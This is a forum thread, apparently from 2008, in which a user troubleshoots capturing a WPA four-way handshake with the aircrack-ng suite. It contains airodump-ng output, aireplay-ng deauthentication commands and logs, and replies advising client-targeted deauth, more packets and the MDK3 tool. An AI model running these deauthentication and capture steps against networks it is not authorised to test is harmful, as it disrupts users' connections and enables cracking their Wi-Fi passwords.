Results 1 to 4 of 4

Thread: Problems with 4 way handshake...

  1. #1
    Just burned his ISO
    Join Date
    Aug 2008
    Posts
    9

    Default Problems with 4 way handshake...

    Cant get the 4 way handshake captured.... not understanding why my router wont allow me to deauthenticate any advice welcome..
    CH 5 ][ Elapsed: 6 mins ][ 2008-09-28 17:04 *(NOTHING APPEARED HERE DURING DEAUTH)*

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:1D:5A:F7:80:E9 50 0 3450 210346 821 5 54. WPA TKIP PSK 2WIRE606

    BSSID STATION PWR Rate Lost Packets Probes

    00:1D:5A:F7:80:E9 00:19:5B:02:33:74 52 54-54 620 210135

    -----------------------------------------------------------------------------------------

    Deauth:

    bt ~ # aireplay-ng -0 5 -a 00:1D:5A:F7:80:E9 wlan0
    16:58:01 Waiting for beacon frame (BSSID: 00:1D:5A:F7:80:E9) on channel 5
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    16:58:01 Sending DeAuth to broadcast -- BSSID: [00:1D:5A:F7:80:E9]
    16:58:03 Sending DeAuth to broadcast -- BSSID: [00:1D:5A:F7:80:E9]
    16:58:04 Sending DeAuth to broadcast -- BSSID: [00:1D:5A:F7:80:E9]
    16:58:04 Sending DeAuth to broadcast -- BSSID: [00:1D:5A:F7:80:E9]
    16:58:05 Sending DeAuth to broadcast -- BSSID: [00:1D:5A:F7:80:E9]




    Testing capture just to make sure it wasnt missed:

    bt ~ # aircrack-ng wpa-01.cap
    Opening wpa-02.cap
    Read 40320 packets.

    # BSSID ESSID Encryption

    1 00:1D:5A:F7:80:E9 2WIRE606 WPA (0 handshake)

    Choosing first network as target.


    The wpa cap file name is correct and my desktop is connected (CLIENT) but cant deauth it..

  2. #2
    Member imported_pynstrom's Avatar
    Join Date
    May 2008
    Posts
    143

    Default

    Try using the host(-h) and client(-c) option when running aireplay-ng to deauth.
    Code:
    aireplay-ng -0 5 -a <ap_mac> -h <host_mac> -c <client_mac> <interface>
    This may help.
    When hungry, eat your rice; when tired, close your eyes. Fools may laugh at me, but wise men will know what I mean. -- Lin-Chi
    - - - - - - - -
    I slept once, it was a Tuesday.

  3. #3
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    As pynstrom says targeting the client will generally give you a greater success rate. You should also make sure that you are close enough to the AP for it to receive your injected packets and close enough to the client as well so that you can intercept the client side of the handshake. As you currently only are sending 5 de-authentication packets I would also advice you to increase the amount.

    If your problems using the de-authentication attack in aireplay-ng persist, you could always give MDK3 a try.
    -Monkeys are like nature's humans.

  4. #4
    Just burned his ISO
    Join Date
    Aug 2008
    Posts
    9

    Default

    The handshake was successful thanx guys!

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •